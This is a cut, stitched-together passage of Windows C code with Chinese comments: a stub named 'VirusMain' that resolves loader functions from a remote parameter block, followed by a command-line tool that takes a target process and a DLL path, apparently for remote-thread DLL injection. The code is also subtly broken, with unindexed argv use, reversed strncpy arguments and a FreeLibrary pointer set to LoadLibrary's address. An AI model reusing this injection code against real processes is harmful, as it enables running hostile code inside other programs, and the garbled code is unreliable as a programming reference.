if(hProcessSnap !=INVALID_HANDLE_value)CloseHandle(hProcessSnap);
return dwRet;
}

DWORD __stdcall VirusMain(RemotePara *Para){
       typedef HINSTANCE (__stdcall *PLoadLibrary)(char*);
typedef FARPROC (__stdcall *PGetProcAddress)(HMODULE, LPCSTR);
typedef HINSTANCE (__stdcall *PFreeLibrary)( HINSTANCE );
       PLoadLibrary LoadLibraryFunc             = (PLoadLibrary)Para->dwLoadLibrary;
PGetProcAddress GetProcAddressFunc       = (PGetProcAddress)Para->dwGetProcAddress;
PFreeLibrary FreeLibraryFunc             = (PFreeLibrary)Para->dwLoadLibrary;
       //
}
  
 
 

#include<windows.h>
#include<stdlib.h>
#include<stdio.h>
#include<psapi.h>

DWORD ProcessToPID( char *);            //将进程名转换为PID的函数
void  CheckError  ( int, int, char *);        //出错处理函数
void  usage       ( char *);            //使用说明函数

PDWORD pdwThreadId;
HANDLE hRemoteThread, hRemoteProcess;
DWORD  fdwCreate, dwStackSize, dwRemoteProcessId;
PWSTR  pszLibFileRemote=NULL;

void main(int argc,char **argv)
{
   int iReturnCode;
   char lpDllFullPathName[MAX_PATH];
   WCHAR pszLibFileName[MAX_PATH]={0};
   //处理命令行参数
   if (argc!=3) usage("Parametes number incorrect!");
   else{
       //如果输入的是进程名，则转化为PID
       if(isdigit(*argv)) dwRemoteProcessId = atoi(argv);
       else dwRemoteProcessId = ProcessToPID(argv);
       //判断输入的DLL文件名是否是绝对路径
       if(strstr(argv,":\\")!=NULL)
           strncpy(argv, lpDllFullPathName, MAX_PATH);
       else
       {    //取得当前目录，将相对路径转换成绝对路径
           iReturnCode = GetCurrentDirectory(MAX_PATH, lpDllFullPathName);
           CheckError(iReturnCode, 0, "GetCurrentDirectory");
           strcat(lpDllFullPathName, "\\");
           strcat(lpDllFullPathName, argv);
           printf("Convert DLL filename to FullPathName:\n\t%s\n\n",
lpDllFull